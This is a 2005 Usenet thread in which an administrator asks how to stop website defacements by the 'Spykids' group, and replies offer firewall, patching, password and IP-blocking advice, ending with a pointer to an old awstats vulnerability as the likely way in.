SPykids is a known defacer of Web Site. How does one prevent them
from ever having access to Server or even a LAN?

Customer complained:

Spykids should not be able to get into our websites
regardless of whether they are
piggy-backing on a member or not. This has happened 2x so far.

----------------------------

I am running Apache most current version.

Pointers?
--
Member - Liberal International
This is doctor@nl2k.ab.ca Ici doctor@nl2k.ab.ca
God Queen and country! Beware Anti-Christ rising!
Better to serve in Heaven that to Rule in Hell.

Find out how they're getting in, and lock that down.

In article <dc8ti0$nld$2@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca
says...
> SPykids is a known defacer of Web Site. How does one prevent them
> from ever having access to Server or even a LAN?
>
> Customer complained:
>
> Spykids should not be able to get into our websites
> regardless of whether they are
> piggy-backing on a member or not. This has happened 2x so far.

You need to learn how they are getting in, what measures you can do to
block it and such.

First, put the web server behind a dedicated firewall, not a NAT box, a
firewall - only allow real HTTP or HTTPS sessions to it.

Require users to have strong passwords, look it up if you don't know
what that means.

Block IP networks that don't need access to your web sites - as an
example I block about 50 subnets in countries outside of our own and it
cuts down on a lot of attempts.

--

spam999free@rrohio.com
remove 999 in order to email me

In article <1122512684.976893.18840@g49g2000cwa.googlegroups. com>,
Big Kahuna <chris@okennon.com> wrote:
>Find out how they're getting in, and lock that down.
>

Which logs should I be looking at? I did not find anything in te Web Logs.

Where next?
--
Member - Liberal International
This is doctor@nl2k.ab.ca Ici doctor@nl2k.ab.ca
God Queen and country! Beware Anti-Christ rising!
Better to serve in Heaven that to Rule in Hell.

In article <MPG.1d52008b4f03a9a6989a7a@news-server.columbus.rr.com>,
Leythos <void@nowhere.lan> wrote:
>In article <dc8ti0$nld$2@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca
>says...
>> SPykids is a known defacer of Web Site. How does one prevent them
>> from ever having access to Server or even a LAN?
>>
>> Customer complained:
>>
>> Spykids should not be able to get into our websites
>> regardless of whether they are
>> piggy-backing on a member or not. This has happened 2x so far.
>
>You need to learn how they are getting in, what measures you can do to
>block it and such.
>
>First, put the web server behind a dedicated firewall, not a NAT box, a
>firewall - only allow real HTTP or HTTPS sessions to it.
>
>Require users to have strong passwords, look it up if you don't know
>what that means.
>
>Block IP networks that don't need access to your web sites - as an
>example I block about 50 subnets in countries outside of our own and it
>cuts down on a lot of attempts.
>

I am using pf via OpenBSD. What do I need to add?
--
Member - Liberal International
This is doctor@nl2k.ab.ca Ici doctor@nl2k.ab.ca
God Queen and country! Beware Anti-Christ rising!
Better to serve in Heaven that to Rule in Hell.

-----BEGIN PGP SIGNED MESSAGE-----

The Doctor wrote:
> In article <MPG.1d52008b4f03a9a6989a7a@news-server.columbus.rr.com>,
> Leythos <void@nowhere.lan> wrote:
>
>>In article <dc8ti0$nld$2@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca
>>says...
>>
>>>SPykids is a known defacer of Web Site. How does one prevent them
>>>from ever having access to Server or even a LAN?
>>>
>>>Customer complained:
>>>
>>>Spykids should not be able to get into our websites
>>>regardless of whether they are
>>>piggy-backing on a member or not. This has happened 2x so far.
>>
>>You need to learn how they are getting in, what measures you can do to
>>block it and such.
>>
>>First, put the web server behind a dedicated firewall, not a NAT box, a
>>firewall - only allow real HTTP or HTTPS sessions to it.
>>
>>Require users to have strong passwords, look it up if you don't know
>>what that means.
>>
>>Block IP networks that don't need access to your web sites - as an
>>example I block about 50 subnets in countries outside of our own and it
>>cuts down on a lot of attempts.
>>
>
>
> I am using pf via OpenBSD. What do I need to add?

Only install services that Apache needs and keep both your OpenBSD and
Apache fully patched at all times. If you do that, you won't even need a
firewall. But if the firewall is based on another computer, it doesn't
hurt much (iow, even a firewall can have its buffer overflows and other
stuff)..

Then there is 0-day exploits. Not much you can do about them I am afraid..

Also, change your passwords after a fresh install. And make them
unquessable (like not using the pw 'God' for your 'root' account).

Thomas
- --
Life is like a videogame with no chance to win - ATR
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iQB5AwUBQuisWQEP2l8iXKAJAQEEmwMfXcrsBo5rSbU0sY0+oS bRbU/taK2xqlTg
AZoaBEDsAy8/8xvb1Do+jTQbRkg5SGi9daIbAV3aJgGyIt+gyW2kJ+FR3WZ6lt 35
i3uHQ3c+Nw2JnA4e6QUQDiiULij7djQ7CBWh3Q==
=dMvm
-----END PGP SIGNATURE-----

The Doctor <doctor@doctor.nl2k.ab.ca> wrote:
> Big Kahuna <chris@okennon.com> wrote:

>>Find out how they're getting in, and lock that down.
>>
>
> Which logs should I be looking at? I did not find anything in te Web Logs.
>
> Where next?

http://www.google.com/search?q=securing+howto
--
Ich danke GMX dafür, die Verwendung meiner Adressen mittels per SPF
verbreiteten Lügen zu sabotieren.

In article <dc9d6p$53n$3@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca
says...
> In article <MPG.1d52008b4f03a9a6989a7a@news-server.columbus.rr.com>,
> Leythos <void@nowhere.lan> wrote:
> >In article <dc8ti0$nld$2@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca
> >says...
> >> SPykids is a known defacer of Web Site. How does one prevent them
> >> from ever having access to Server or even a LAN?
> >>
> >> Customer complained:
> >>
> >> Spykids should not be able to get into our websites
> >> regardless of whether they are
> >> piggy-backing on a member or not. This has happened 2x so far.
> >
> >You need to learn how they are getting in, what measures you can do to
> >block it and such.
> >
> >First, put the web server behind a dedicated firewall, not a NAT box, a
> >firewall - only allow real HTTP or HTTPS sessions to it.
> >
> >Require users to have strong passwords, look it up if you don't know
> >what that means.
> >
> >Block IP networks that don't need access to your web sites - as an
> >example I block about 50 subnets in countries outside of our own and it
> >cuts down on a lot of attempts.
> >
>
> I am using pf via OpenBSD. What do I need to add?

I don't use that combination, so I can't specifically state what you
need to use, but, I have to ask:

1) Is the firewall and web server the same machine?
If so, bad idea, firewall should be a stripped down machine with
minimal services and only the firewall application.

2) Did you secure Apache and the OS on the machine you use?

3) Does your site require user authentication?

I'm in the US and don't do business with foreign companies or need to
provide access to our services from foreign hosts, so I block many
subnets that seem to target our public IP addresses, here is my short
list, it may not work for you.

12.144.182.0/24
12.45.203.0/24
12.98.139.0/24
155.48.106.0/24
168.126.0.0/16
172.184.111.203
193.251.0.0/16
193.252.0.0/16
193.253.0.0/16
195.174.0.0/16
195.175.16.0/20
195.58.124.0/24
200.30.203.0/24
202.88.186.0/24
203.152.22.0/24
205.251.79.0/24
210.173.37.0/24
210.201.153.0/24
210.71.115.0/24
211.54.40.0/25
212.150.124.0/24
212.18.57.0/24
212.202.178.0/24
212.27.32.0-212.27.63.255
212.64.192.0-212.64.203.255
212.64.223.160/29
212.64.223.168/29
212.9.7.0/24
213.13.26.0/24
213.144.176.0/24
213.190.213.0/24
213.228.7.0/24
213.228.8.0/24
216.184.97.0/24
216.76.35.0/24
217.118.224.0/24
217.118.225.0/24
217.118.239.0/24
217.160.110.0/24
218.164.28.0/24
218.252.74.0/24
218.67.128.0-218.69.255.255
218.69.108.0/24
218.69.148.0/24
218.76.98.0/24
219.212.4.0/24



--

spam999free@rrohio.com
remove 999 in order to email me

In article <MPG.1d52a8716b851357989a7c@news-server.columbus.rr.com>,
Leythos <void@nowhere.lan> wrote:
>In article <dc9d6p$53n$3@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca
>says...
>> In article <MPG.1d52008b4f03a9a6989a7a@news-server.columbus.rr.com>,
>> Leythos <void@nowhere.lan> wrote:
>> >In article <dc8ti0$nld$2@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca
>> >says...
>> >> SPykids is a known defacer of Web Site. How does one prevent them
>> >> from ever having access to Server or even a LAN?
>> >>
>> >> Customer complained:
>> >>
>> >> Spykids should not be able to get into our websites
>> >> regardless of whether they are
>> >> piggy-backing on a member or not. This has happened 2x so far.
>> >
>> >You need to learn how they are getting in, what measures you can do to
>> >block it and such.
>> >
>> >First, put the web server behind a dedicated firewall, not a NAT box, a
>> >firewall - only allow real HTTP or HTTPS sessions to it.
>> >
>> >Require users to have strong passwords, look it up if you don't know
>> >what that means.
>> >
>> >Block IP networks that don't need access to your web sites - as an
>> >example I block about 50 subnets in countries outside of our own and it
>> >cuts down on a lot of attempts.
>> >
>>
>> I am using pf via OpenBSD. What do I need to add?
>
>I don't use that combination, so I can't specifically state what you
>need to use, but, I have to ask:
>
>1) Is the firewall and web server the same machine?
> If so, bad idea, firewall should be a stripped down machine with
> minimal services and only the firewall application.

Firewall, the OpenBSD machine running pf, is ISOLATED!

>
>2) Did you secure Apache and the OS on the machine you use?

I am running BSD/OS 4.3.1 running current Apache.

Still my compile script looks like:


CC=/usr/bin/gcc CFLAGS="-Wall -DDEBUG -g -O9 -march=i686 " ./configure \
--enable-layout=BSDI\
--enable-v4-mapped \
--enable-maintainer-mode\
--enable-modules=most\
--enable-mods-shared=all\
--disable-optional-hook-export\
--disable-optional-hook-import\
--disable-optional-fn-export\
--disable-optional-fn-import\
--disable-ldap\
--disable-auth-ldap\
--disable-proxy\
--disable-proxy-connect\
--disable-proxy-ftp\
--disable-proxy-http\
--enable-auth-anon=shared\
--enable-auth-dbmi=shared\
--enable-auth-digest=shared\
--enable-file-cache=shared\
--enable-echo=shared\
--enable-charset-lite=shared\
--enable-cache=shared\
--enable-disk-cache=shared\
--enable-mem-cache=shared\
--enable-ext-filter=shared\
--enable-deflate=shared\
--enable-logio=shared\
--enable-mime-magic=shared\
--enable-cern-meta=shared\
--enable-expires=shared\
--enable-headers=shared\
--enable-usertrack=shared\
--enable-unique-id=shared\
--enable-ssl=shared\
--enable-bucketeer=shared\
--enable-static-support\
--enable-static-htpasswd\
--enable-static-htdigest\
--enable-static-rotatelogs\
--enable-static-logresolve\
--enable-static-htdbm\
--enable-static-ab\
--enable-static-checkgid\
--enable-http\
--enable-dav=shared\
--enable-info=shared\
--enable-suexec=shared\
--enable-cgi=shared\
--enable-cgid=shared\
--enable-dav-fs=shared\
--enable-vhost-alias=shared\
--enable-speling=shared\
--enable-rewrite=shared\
--enable-so\
--with-z=/usr\
--with-ssl=/usr/contrib\
--with-mpm=prefork\
--enable-nonportable-atomics=yes\
--with-suexec-bin=/usr/contrib/bin\
--with-suexec-caller=www\
--with-suexec-userdir=html\
--with-suexec-docroot=html\
--with-suexec-uidmin=100\
--with-suexec-gidmin=100\
--with-suexec-logfile=/var/log/httpd/suexec_log\
--with-suexec-safepath=/bin:/usr/bin://usr/contrib/bin\
--with-suexec-umask=022
>
>3) Does your site require user authentication?

In the one that got nailed, .htaccess

>
>I'm in the US and don't do business with foreign companies or need to
>provide access to our services from foreign hosts, so I block many
>subnets that seem to target our public IP addresses, here is my short
>list, it may not work for you.
>
>12.144.182.0/24
>12.45.203.0/24
>12.98.139.0/24
>155.48.106.0/24
>168.126.0.0/16
>172.184.111.203
>193.251.0.0/16
>193.252.0.0/16
>193.253.0.0/16
>195.174.0.0/16
>195.175.16.0/20
>195.58.124.0/24
>200.30.203.0/24
>202.88.186.0/24
>203.152.22.0/24
>205.251.79.0/24
>210.173.37.0/24
>210.201.153.0/24
>210.71.115.0/24
>211.54.40.0/25
>212.150.124.0/24
>212.18.57.0/24
>212.202.178.0/24
>212.27.32.0-212.27.63.255
>212.64.192.0-212.64.203.255
>212.64.223.160/29
>212.64.223.168/29
>212.9.7.0/24
>213.13.26.0/24
>213.144.176.0/24
>213.190.213.0/24
>213.228.7.0/24
>213.228.8.0/24
>216.184.97.0/24
>216.76.35.0/24
>217.118.224.0/24
>217.118.225.0/24
>217.118.239.0/24
>217.160.110.0/24
>218.164.28.0/24
>218.252.74.0/24
>218.67.128.0-218.69.255.255
>218.69.108.0/24
>218.69.148.0/24
>218.76.98.0/24
>219.212.4.0/24
>
>
>
>--
>
>spam999free@rrohio.com
>remove 999 in order to email me


--
Member - Liberal International
This is doctor@nl2k.ab.ca Ici doctor@nl2k.ab.ca
God Queen and country! Beware Anti-Christ rising!
Better to serve in Heaven that to Rule in Hell.

In article <dcaunf$fn7$13@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca
says...
> >Also, change your passwords after a fresh install. And make them
> >unquessable (like not using the pw 'God' for your 'root' account).
>
> I use the 3-4 combination on a 7+ string password.

But, if you use any word found in a dictionary or a name or place or
anything other than a mix of letters, numbers, upper case/lower case,
you are fooling yourself if you think your password is safe.

Use 10+ characters and a mix like Q74btl771Ne or, if your system
permits, use special characters like !@#$%^&*() in the password.


--

spam999free@rrohio.com
remove 999 in order to email me

In article <MPG.1d52c9b8de84e4ab989a80@news-server.columbus.rr.com>,
Leythos <void@nowhere.lan> wrote:
>In article <dcaunf$fn7$13@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca
>says...
>> >Also, change your passwords after a fresh install. And make them
>> >unquessable (like not using the pw 'God' for your 'root' account).
>>
>> I use the 3-4 combination on a 7+ string password.
>
>But, if you use any word found in a dictionary or a name or place or
>anything other than a mix of letters, numbers, upper case/lower case,
>you are fooling yourself if you think your password is safe.
>
>Use 10+ characters and a mix like Q74btl771Ne or, if your system
>permits, use special characters like !@#$%^&*() in the password.
>

Dictionary attack. I know about those. I tell people the 3 or 4 combo.

3 combo is Caps, smalls and numbers. Guess which is 4.


>
>--
>
>spam999free@rrohio.com
>remove 999 in order to email me


--
Member - Liberal International
This is doctor@nl2k.ab.ca Ici doctor@nl2k.ab.ca
God Queen and country! Beware Anti-Christ rising!
Better to serve in Heaven that to Rule in Hell.

On Wed, 27 Jul 2005 22:15:44 +0000, The Doctor wrote:

> I am running Apache most current version.

php?
do your customers have their own ftp access?
cgi?
do you/your_customers use phpBB or equivalent?

--
* Cristiano Deana, FreeCRIS - Biella
* Honda Hornet 600 grigionera, Andúril
* No, non metto faccine. Aggiungile tu a caso

In article <42ef7e0d$1_1@newsgate.x-privat.org>,
Cristiano Deana - FreeCRIS <freecris@despammed.com> wrote:
>On Wed, 27 Jul 2005 22:15:44 +0000, The Doctor wrote:
>
>> I am running Apache most current version.
>
>php?

5.0.4

>do your customers have their own ftp access?

Yes.

>cgi?

Yes.

>do you/your_customers use phpBB or equivalent?
>

Only one and it is the most current version.

>--
>* Cristiano Deana, FreeCRIS - Biella
>* Honda Hornet 600 grigionera, Andúril
>* No, non metto faccine. Aggiungile tu a caso
>


--
Member - Liberal International
This is doctor@nl2k.ab.ca Ici doctor@nl2k.ab.ca
God Queen and country! Beware Anti-Christ rising!
Better to serve in Heaven that to Rule in Hell.

spykids exploited a vunerability in old versions of awstats (v5.0-6.3 i
think).
update awstats or don't use it, plus all the good advice above

a story from someone with "first hand" experience.
http://www.bazon.net/mishoo/home.epl?NEWS_ID=1106

In article <1123060630.002052.19810@g49g2000cwa.googlegroups. com>,
neale <neale@ranns.org> wrote:
>
>spykids exploited a vunerability in old versions of awstats (v5.0-6.3 i
>think).
>update awstats or don't use it, plus all the good advice above
>

awstata is a flop of a progreamme. Still I will look around.

I prefer wwwstats, and analog.

>a story from someone with "first hand" experience.
>http://www.bazon.net/mishoo/home.epl?NEWS_ID=1106
>


--
Member - Liberal International
This is doctor@nl2k.ab.ca Ici doctor@nl2k.ab.ca
God Queen and country! Beware Anti-Christ rising!
Better to serve in Heaven that to Rule in Hell.